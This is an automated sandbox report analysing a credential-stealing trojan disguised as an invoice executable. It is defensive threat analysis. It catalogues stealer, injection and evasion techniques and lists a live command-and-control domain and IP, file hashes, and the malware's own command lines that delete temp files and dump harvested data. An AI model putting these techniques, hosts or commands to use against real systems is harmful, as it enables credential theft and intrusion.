automated malware analysis report for facture 1398665.exe ...contains functionality to adjust token...

ID: 549628 Sample Name: facture_1398665.exe Cookbook: frenchkeyboardlayout.jbs Time: 14:48:31 Date: 07/05/2018 Version: 21.0.0


Page 1: Automated Malware Analysis Report for facture 1398665.exe ...Contains functionality to adjust token privileges (e.g. debug / backup) Contains functionality to check free disk space



Table of Contents

Analysis Report
Overview
General Information
Detection
Confidence
Classification
Analysis Advice
Signature Overview
Key, Mouse, Clipboard, Microphone and Screen Capturing
Networking
Boot Survival
Stealing of Sensitive Information
Persistence and Installation Behavior
Data Obfuscation
Spreading
System Summary
HIPS / PFW / Operating System Protection Evasion
Anti Debugging
Malware Analysis System Evasion
Hooking and other Techniques for Hiding and Protection
Lowering of HIPS / PFW / Operating System Security Settings
Language, Device and Operating System Detection
Behavior Graph
Simulations
Behavior and APIs
Antivirus Detection
Initial Sample
Dropped Files
Unpacked PE Files
Domains
URLs
Yara Overview
Initial Sample
PCAP (Network Traffic)
Dropped Files
Memory Dumps
Unpacked PEs
Screenshots
Startup
Created / dropped Files
Contacted Domains/Contacted IPs
Contacted Domains
Contacted IPs
Public
Private
Static File Info
General
File Icon
Static PE Info
General
Entrypoint Preview
Data Directories
Sections
Resources
Imports
Version Infos
Possible Origin
Network Behavior
Network Port Distribution
TCP Packets
UDP Packets
DNS Queries
DNS Answers
HTTP Request Dependency Graph
HTTPS Packets
HTTPS Proxied Packets
Code Manipulations
Statistics
Behavior
System Behavior
Analysis Process: facture_1398665.exe PID: 3792 Parent PID: 3020
General
File Activities
File Created
File Deleted

Copyright Joe Security LLC 2018 Page 2 of 149



File Written
File Read
Analysis Process: facture_1398665.tmp PID: 3824 Parent PID: 3792
General
File Activities
File Created
File Moved
File Written
File Read
Registry Activities
Analysis Process: firefox.exe PID: 3844 Parent PID: 3824
General
File Activities
File Created
File Written
File Read
Analysis Process: firefox.exe PID: 3948 Parent PID: 3844
General
File Activities
File Read
Analysis Process: firefox.exe PID: 3964 Parent PID: 1376
General
File Activities
File Created
File Deleted
File Written
File Read
Registry Activities
Key Value Created
Analysis Process: dllhost.exe PID: 2032 Parent PID: 3964
General
File Activities
File Created
File Deleted
File Read
Registry Activities
Analysis Process: cmd.exe PID: 1036 Parent PID: 2032
General
Analysis Process: msiexec.exe PID: 1916 Parent PID: 2032
General
File Activities
File Created
File Deleted
File Written
File Read
Analysis Process: msiexec.exe PID: 2224 Parent PID: 2032
General
File Activities
File Read
Analysis Process: explorer.exe PID: 1376 Parent PID: 2032
General
Disassembly
Code Analysis


Analysis Report

Overview

General Information

Joe Sandbox Version: 21.0.0

Analysis ID: 549628

Start time: 14:48:31

Joe Sandbox Product: Cloud

Start date: 07.05.2018

Overall analysis duration: 0h 24m 2s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: facture_1398665.exe

Cookbook file name: frenchkeyboardlayout.jbs

Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)

Number of new started processes analysed: 15

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 1

Technologies: HCA enabled, EGA enabled, GSI enabled (VBA), GSI enabled (Javascript), GSI enabled (Java)

Analysis stop reason: Timeout

Detection: MAL

Classification: mal100.evad.phis.spyw.troj.winEXE@17/110@2/1

HCA Information: Successful, ratio: 88%, number of executed functions: 0, number of non-executed functions: 0

EGA Information: Successful, ratio: 100%

Cookbook Comments: Adjust boot time; Correcting counters for adjusted boot time; Set French Keyboard Layout (default); Found application associated with file extension: .exe

Warnings:

Exclude process from analysis (whitelisted): sppsvc.exe, conhost.exe, WMIADAP.exe, dllhost.exe
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy Score Range Reporting Detection

Threshold 100 0 - 100 Report FP / FN


Confidence

Strategy Score Range Further Analysis Required? Confidence

Threshold 5 0 - 5 false

Analysis Advice

Contains functionality to modify the execution of threads in other processes

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook

Classification

[Classification chart: the categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader and Miner are each rated on a clean / suspicious / malicious scale]

Signature Overview

• Key, Mouse, Clipboard, Microphone and Screen Capturing

• Networking

• Boot Survival

• Stealing of Sensitive Information

• Persistence and Installation Behavior

• Data Obfuscation

• Spreading

• System Summary

• HIPS / PFW / Operating System Protection Evasion

• Anti Debugging

• Malware Analysis System Evasion

• Hooking and other Techniques for Hiding and Protection

• Lowering of HIPS / PFW / Operating System Security Settings

• Language, Device and Operating System Detection


Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Networking:

HTTP GET or POST without a user agent

Contains functionality to download additional files from the internet

Found strings which match to known social media urls

Performs DNS lookups

Posts data to webserver

Urls found in memory or binary data

Uses HTTPS

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)

Stores files to the Windows start menu directory

Stealing of Sensitive Information:

Searches for Windows Mail specific files

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file access)

Persistence and Installation Behavior:

Installs new ROOT certificates

Drops PE files

Data Obfuscation:

Contains functionality to dynamically determine API calls

Uses code obfuscation techniques (call, push, ret)

Spreading:

Enumerates the file system

Contains functionality to enumerate / list files inside a directory

System Summary:

Contains functionality to communicate with device drivers

Contains functionality to launch a process as a different user

Contains functionality to shutdown / reboot the system

Creates mutexes

Detected potential crypto function

Found potential string decryption / allocating functions

PE file contains executable resources (Code or Archives)

PE file contains strange resources

PE file does not import any functions

Reads the hosts file

Sample file is different than original file name gathered from version info

Sample reads its own file content

Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)

Classification label

Contains functionality for error logging

Contains functionality to adjust token privileges (e.g. debug / backup)

Contains functionality to check free disk space

Contains functionality to instantiate COM classes

Contains functionality to load and extract PE file embedded resources

Creates files inside the user directory

Creates temporary files

Found command line output

Parts of this applications are using Borland Delphi (Probably coded in Delphi)

Queries a list of all open handles

Reads ini files

Reads software policies

Reads the Windows registered organization settings

Spawns processes

Uses an in-process (OLE) Automation server

Reads the Windows registered owner settings

Executable creates window controls seldom found in malware

Found graphical window changes (likely an installer)

Checks if Microsoft Office is installed

Submission file is bigger than most known malware samples

Uses new MSVCR Dlls

Contains modern PE file flags such as dynamic base (ASLR) or NX

Binary contains paths to debug symbols

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Modifies the context of a thread in another process (thread injection)

Writes to foreign memory regions


Contains functionality to launch a program with higher privileges

Creates a process in suspended mode (likely to inject code)

Contains functionality to add an ACL to a security descriptor

Contains functionality to create a new security descriptor

May try to detect the Windows Explorer process (often used for injection)

Anti Debugging:

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to register its own exception handler

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Checks the free space of harddrives

Contains long sleeps (>= 3 min)

Enumerates the file system

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Contains functionality to enumerate / list files inside a directory

Contains functionality to query system information

Program exit points

Queries a list of all running processes

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Extensive use of GetProcAddress (often used to hide API calls)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Stores large binary data to the registry

Disables application error messages (SetErrorMode)

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies Internet Explorer zone settings

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)

Contains functionality to query CPU information (cpuid)

Queries the volume information (name, serial number etc) of a device

Contains functionality to create pipes for IPC

Contains functionality to query local / system time

Contains functionality to query the account / user name

Contains functionality to query time zone information

Contains functionality to query windows version

Queries the cryptographic machine GUID


Behavior Graph

ID: 549628
Sample: facture_1398665.exe
Startdate: 07/05/2018
Architecture: WINDOWS
Score: 100

[Graph nodes and edges, in the order extracted from the figure]

firefox.exe
9 12
started
facture_1398665.exe
2
started
truand-2-la-galere.money
91.92.137.74, 443, 49162, 49164
RT-ELECTRONICS-2015GazInvestProektltdBG
Bulgaria
Installs new ROOT certificates
Modifies Internet Explorer zone settings
Tries to harvest and steal browser information (history, passwords, etc)
3 other signatures
dllhost.exe
15
started
C:\Users\user~1\...\facture_1398665.tmp, PE32
dropped
facture_1398665.tmp
5 58
started
Changes memory attributes in foreign processes to executable or writable
Injects code into the Windows Explorer (explorer.exe)
Writes to foreign memory regions
4 other signatures
msiexec.exe
started
msiexec.exe
1
started
cmd.exe
started
explorer.exe
injected
C:\Users\user~1\AppData\...\is-VQCNU.tmp, PE32
dropped
C:\Users\user~1\AppData\...\is-UPNUP.tmp, PE32
dropped
C:\Users\user~1\AppData\...\is-UJ2Q7.tmp, PE32
dropped
44 other files (none is malicious)
dropped
firefox.exe
57
started
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Searches for Windows Mail specific files
Tries to harvest and steal browser information (history, passwords, etc)
C:\Users\user\AppData\Roaming\...\firefox.exe, PE32
dropped
C:\Users\user\AppData\...\vcruntime140.dll, PE32
dropped
C:\Users\user\AppData\...\ucrtbase.dll, PE32
dropped
44 other files (none is malicious)
dropped
firefox.exe
started
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Contains functionality to inject threads in other processes

Legend:
Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Simulations

Behavior and APIs

Time Type Description
14:49:22 API Interceptor 1x Sleep call for process: facture_1398665.tmp modified
14:49:26 API Interceptor 182x Sleep call for process: firefox.exe modified
14:49:26 Autostart Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F48A04623C4E0000.lnk
14:49:33 API Interceptor 1x Sleep call for process: facture_1398665.exe modified
14:49:48 API Interceptor 56x Sleep call for process: dllhost.exe modified
14:50:15 API Interceptor 505x Sleep call for process: explorer.exe modified
14:50:21 API Interceptor 4x Sleep call for process: msiexec.exe modified

Antivirus Detection

Initial Sample: No Antivirus matches
Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches
URLs: No Antivirus matches

Yara Overview

Initial Sample: No yara matches
PCAP (Network Traffic): No yara matches
Dropped Files: No yara matches
Memory Dumps: No yara matches
Unpacked PEs: No yara matches

Screenshots

Startup

System is w7_1

facture_1398665.exe (PID: 3792 cmdline: 'C:\Users\user\Desktop\facture_1398665.exe' MD5: FE1214A06FFC40B1EBB524F185894487)
facture_1398665.tmp (PID: 3824 cmdline: 'C:\Users\user~1\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp' /SL5='$7016C,1728489,170496,C:\Users\user\Desktop\facture_1398665.exe' MD5: 9AE8DFC6C5CB2222DBD09F1176058373)
firefox.exe (PID: 3844 cmdline: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe MD5: 52FFABA4273678BAE75442F2BC85B470)
firefox.exe (PID: 3948 cmdline: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe MD5: 52FFABA4273678BAE75442F2BC85B470)
firefox.exe (PID: 3964 cmdline: 'C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe' MD5: 52FFABA4273678BAE75442F2BC85B470)
dllhost.exe (PID: 2032 cmdline: C:\Windows\system32\dllhost.exe MD5: A63DC5C2EA944E6657203E0C8EDEAF61)
cmd.exe (PID: 1036 cmdline: cmd.exe /c del /f /q %temp%\gif* MD5: AD7B9C14083B52BC532FBA5948342B98)
msiexec.exe (PID: 1916 cmdline: '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE740.tmp' MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
msiexec.exe (PID: 2224 cmdline: '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp' MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
explorer.exe (PID: 1376 cmdline: C:\Windows\Explorer.EXE MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\F48A04623C4E0000

Process: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

File Type: ASCII text, with no line terminators

Size (bytes): 49

Entropy (8bit): 4.614310864346762

Encrypted: false

MD5: 8B02B5CEAE137A2D1E66D1B6823368EF

SHA1: 099B0296F551CEA02FACF04F190118270AE39E69

SHA-256: 5BF5808D5C915C8BD4AC1859F98C7341E4992DEB77F5C78A0A8B16ECEAAE9AFC

SHA-512: 7184399DA42019E6B111405BA8C699151FE08D204C1F1E4BA5E039B1293374E1E895FAF12FF01647FCB57ADC0366AF0595E2E975211D31E82298E12E9462FA69

Malicious: false

Reputation: low


C:\Users\user~1\AppData\Local\Temp\F48A04623C4E000032

Process: C:\Users\user\AppData\Roaming\F48A04623C4E0000\firefox.exe

File Type: data

Size (bytes): 517120

Entropy (8bit): 7.534971322819302

Encrypted: false

MD5: 1E6B6C72E08A4ABA036F413C73707502

SHA1: 03EAE9400073369E14A741774AD556CC71094DD7

SHA-256: 6CD510212E0E373C340C3DB475101E68AF14EEF360F2D26DDF6B62551F3DFAC6

SHA-512: 5E4CED43E6856C18FABBC2FAF93107735B320734A233FE72E6C39F45B649B45853965CE286F4809C2935811CF9C5CC60C1D82F22779AF80B7F79E3D9BF846540

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\_pE740.tmp

Process: C:\Windows\System32\msiexec.exe

File Type: Little-endian UTF-16 Unicode text, with no line terminators

Size (bytes): 2

Entropy (8bit): 1.0

Encrypted: false

MD5: F3B25701FE362EC84616A93A45CE9998

SHA1: D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB

SHA-256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209

SHA-512: 98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\bhv57BC.tmp

Process: C:\Windows\System32\msiexec.exe

File Type: data

Size (bytes): 21037056

Entropy (8bit): 0.9035146051395809

Encrypted: false

MD5: 5A16B4673BDC7584EF393926ADAD7FBD

SHA1: E54E45F7A5F18FBBAD3A3FFD10D64989D20F529E

SHA-256: 4B9722A9687B341559CD11F43797B4CAB2DAF49408DB220B6A629760CFCFE24C

SHA-512: 11EE50527616D4B99C8E9F676C743CC7C4DB8A623FAC65A27225BE4C2FE47C3496724F4D2CBD57DB204EFA80E839D1C3F6586F3F8215E3EDCBE42ED4C9D2D159

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3H96L.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 21696

Entropy (8bit): 7.0116845824999805

Encrypted: false

MD5: 6B937FE1EFF0E440B124BBB9334DF34D

SHA1: AB3982AB9D46BAA67B1D59728BC6E93C45872B2B

SHA-256: 71C87C14BC1BD0B20D9F68D4943E93C4C6DDC1B6CF252938BB15FE562552F93E

SHA-512: 13D58EACBAC1D97F780BDF87A29CEEA047F6AC1002C6D79FC661FE7AA759C654BA14842D840887B41C48A15E06ED8358FC1A7E124DD6123D2145F1254364B82F

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-3OGF7.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.106107140155806

Encrypted: false

MD5: EA4AE42721460002DC31515F295AD1C4

SHA1: 8A970D589AA4C178083EE8FB65798A6DDECDC1CF


SHA-256: 668F91E94E76DB4457184909E6A1AB4655E81A8EF37DC37B4ECFE93146C29A88

SHA-512: 5EA1F2FB8BE9FFDF80250B47A440DDB3A41E46A8CE73B6F4834E59CB8D30A1B474F6A33D716EFA43AC7EE52D37AC941F3D51021792B9D1439C831B8A368781B9

Malicious: false

Reputation: low


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 83784

Entropy (8bit): 6.845861669519175

Encrypted: false

MD5: A2523EA6950E248CBDF18C9EA1A844F6

SHA1: 549C8C2A96605F90D79A872BE73EFB5D40965444

SHA-256: 6823B98C3E922490A2F97F54862D32193900077E49F0360522B19E06E6DA24B4

SHA-512: 2141C041B6BDBEE9EC10088B9D47DF02BF72143EB3619E8652296D617EFD77697F4DC8727D11998695768843B4E94A47B1AED2C6FB9F097FFC8A42CA7AAAF66A

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 17600

Entropy (8bit): 7.186846642215803

Encrypted: false

MD5: A616102234EC5AB394FF1C77DA34F6C0

SHA1: 51E54AAFF7F4902B40E657F31775E50000F8240A

SHA-256: 619E5120BFDD11461672CE8798DA00166E57C528B9AFD80404D2C9CBE87E2C07

SHA-512: C360C045D7CCC3D61FFDF35C3253D7F9C59A759A2EE1583519405D2751C12BACC7B26FA383EB53A0156797905F16F26E28293944A0CA31955E03CC07412F822C

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4HQM2.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.096735184430082

Encrypted: false

MD5: 536F07C04C316AAC61AB64A492ED9191

SHA1: 0A2F45D0BA54C4FB5DECBB111BBCC9088FC3269E

SHA-256: 50BF87DA10AE3F442C457E42D6666993B0FCA7C5D4DF521E8CD0959995FBCDDC

SHA-512: B0EC28B75761494A6121C56811DABC297B8E1EA1D56EE4B06A4488D36C16BD26015F2CE945BF9F74B455864828D321AF5DD8B66F839A047458A98984B9343819

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-56M2D.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18104

Entropy (8bit): 7.131532401171639

Encrypted: false

MD5: 9A4FC3727AAF02C3285B47DF5EE56244

SHA1: F88E1EA0BA66D1615D7E1D53C95D8E8DBE6BEBE0

SHA-256: 891CCFEB349116283326262C27B8894B43CDC89B8AFD5BA7D21B891814A68075

SHA-512: 3025CCF26BAB11AEC6476C8091968EA040BB37BD9244F6F9DD4AF0FB79D543266420876A64A9FDCDEEA0BB10932E416EF6909D6ECBAF6577D7AE86F17A71E4B9

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

Size (bytes): 133072

Entropy (8bit): 6.814709386830881

Encrypted: false

MD5: E2F7B050C6C83505611807E81DB58E16


SHA1: A06A6FD60486E8B27E926F30B7D20FC7B2354EED

SHA-256: 9019976DF7D3423DCCEFF61397360BB300F693A1BF98E5BFD33AD3FBEADD24D8

SHA-512: EFB432A1389136A9F87B8834B9C78C1BAF953B84D338621E4841376D03B0A31D1F92186786C3CD8FB390A25A2ED77A2C0F1E3C49F73C57994EF684E552969407

Malicious: false

Reputation: low


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20160

Entropy (8bit): 7.045772919081531

Encrypted: false

MD5: A0DFBD2A68A979D1152E2B9153BB497B

SHA1: 9BE79E52750719AD7B014F803CCF1C8D04C932DE

SHA-256: BFF7EA28E198C7DBEE45D35FD98AE03696E9E252D46BEC9FF7B7823CBA1681F1

SHA-512: 238239FFC9034618DEC8161E15CBDD3B727F1615EF057193C95CED158DD42D876398CFC4854CB790B9DF0EA999F53A980D475ED4827335880D2A47CEA10BD7B5

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

Size (bytes): 875472

Entropy (8bit): 6.9224404430053434

Encrypted: false

MD5: 4BA25D2CBE1587A841DCFB8C8C4A6EA6

SHA1: 52693D4B5E0B55A929099B680348C3932F2C3C62

SHA-256: B30160E759115E24425B9BCDF606EF6EBCE4657487525EDE7F1AC40B90FF7E49

SHA-512: 82E86EC67A5C6CDDF2230872F66560F4B0C3E4C1BB672507BBB8446A8D6F62512CBD0475FE23B619DB3A67BB870F4F742761CF1F87D50DB7F14076F54006F6C6

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 917184

Entropy (8bit): 6.825553978446455

Encrypted: false

MD5: D2C5233317767EE9329F470C39B046B1

SHA1: 42493597D3DED76DAA9A3C5CAD5D4343958D0D55

SHA-256: F085B1B009AB89049BA95DD4FFDE276D5B1F6FA0055F58DC3FC0D4B03AE8116D

SHA-512: 930B31042B5DDC507D4810C10677DB9786B8A16AD8A3ED09BA0A6256DDDC9C2706D1957ABBE3071D09C8CDCC2F142914AE7F7B727DC3E9F8DD7D821D118B715A

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7JLII.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18104

Entropy (8bit): 7.190985597083441

Encrypted: false

MD5: 13BBF7740AFC464172B00F9638BC4F81

SHA1: A92D84A10B161342FCF0E51AD1C287F9B8890525

SHA-256: FF482F69F2183B5FD3C1B45D9006156524B8F8A5F518E33D6E92EA079787E64D

SHA-512: F572E67384EF07790AAAEC8C8E5CAB6C4E9ED954CAF95033CB31121185780A9CD74A5AB123F744F1AE7F889D8DFC9F8AA3BE70999224FD6A1A37FF27BD8AB0D0

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.127398472524706

Encrypted: false


MD5: F7AF6BB63229721005C8AC85DC86F5C2

SHA1: 35DDD88FBEA433A7E934AB0CA64907F8B0A85D9A

SHA-256: FA10F7E2AB54C2EBCD4688E39BC4AF1544FA21B73BE7FD0562B3FF7CFF041F7A

SHA-512: E4F242EC6204DD481EA5B8B1EDBFB9A7C8B136D9869FB85868325B21248AA170FECDF43075361E188B20A6F138F3760226B4CFB302929E04CD3901E6CB03961A

Malicious: false

Reputation: low


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 24256

Entropy (8bit): 6.86072682024164

Encrypted: false

MD5: D67520BFF673CAB4B2ED1AF12DE37A1F

SHA1: 752DEACC54982012852E68C37253E95B8BB89AEE

SHA-256: 44BBB2AEC747E1CBC63FC7C4D2E8C5EC1CA9F9D026835AC2CCB0D60971B6107A

SHA-512: A960EC529E6889B0F3253869FC72C4F65615141D23F42D808DE99E192B89B15DBC24B1D37812DC89F68576662173F18BC047A46B92598567E8C7E37E51821AB0

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 440120

Entropy (8bit): 6.655941426443587

Encrypted: false

MD5: D25C3FF7A4CBBFFC7C9FFF4F659051CE

SHA1: 02FE8D84D7F74C2721FF47D72A6916028C8F2E8A

SHA-256: 9C1DC36D319382E1501CDEAAE36BAD5B820EA84393EF6149E377D2FB2FC361A5

SHA-512: 945FE55B43326C95F1EEE643D46A53B69A463A88BD149F90E9E193D71B84F4875455D37FD4F06C1307BB2CDBE99C1F6E18CB33C0B8679CD11FEA820D7E728065

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18112

Entropy (8bit): 7.133848449054411

Encrypted: false

MD5: 4C745DC13735B4822FF160CB18B61E22

SHA1: CDC23598548A2F1CBF9AC2BA1003B6D6AF0471D0

SHA-256: 550D4FC902F25F2A0C09F475B5CECEE43FB3A0A042126479560B0001DB5C4891

SHA-512: C4AC87FCD7F2130651C69D939929C013E663EB14502452808AB887A735F3DE34EF28E9C98491C3D427B936D3E53C2840F3195ED6EE62D10730DA29267D78149B

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 72896

Entropy (8bit): 5.834415075746363

Encrypted: false

MD5: BF090F2290C18F96FD359A6596EA4233

SHA1: BA1FD71AEFFB0E9629CF0DDC5D5E4704627FB0E5

SHA-256: 5710E3ED5819CCAA9CF558AB57534BC880C610C06F2A44ADFAFBFAB5BFC38C2B

SHA-512: 01B3D02B6FB7B6ED7302903D8E2937372A5BA582755CCD73D4FAE2B904F278BD4F38C3C2B0CC12F7DA8AC4DBE204976CFB492D8AFE7497F39B800ADC652BAC64

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 18624

Entropy (8bit): 7.107805652186164

Copyright Joe Security LLC 2018 Page 15 of 149

Encrypted: false

MD5: F43A8E9CD787B6D91BB29DBB8EB1A4E5

SHA1: 336B61853627E6E64A10FBB930577D30334E615E

SHA-256: 5BACBBE62E36AD0F6D7742E70361F26BC56A44DBD28CC0291F588420E0C218A6

SHA-512: 1FDC1170907346EF0ECED900DE9091136A6626C4BFC8B4416DFEBBE356F35F9C2BE0D2CF6C37E3DD231F3DB8B5A3AFE8973F15A45544C0C1C10682FE03911616

Malicious: false

Reputation: low

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp

Process: C:\Users\user\AppData\Local\Temp\is-TFU0D.tmp\facture_1398665.tmp

File Type: PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit

Size (bytes): 20672

Entropy (8bit): 7.0106564368261175

Encrypted: false

MD5: 1622347A34EBA068916713CF28F46B67

SHA1: 18B3960E88118195F17C4BEF47DF1F7935CEE459

SHA-256: 9766C4200B3F51630097FCE8D4F10B33383E663601802ADA72660604876C99E9

SHA-512: 90B2398918487E0CCFE8F859AEE6E729A4063A110204644A75649331F10895B6C4DE09E57B6E20E8FAC04AC413F54A82889E602D05F5F42690B87D9C2253FA2E

Malicious: false

Reputation: low

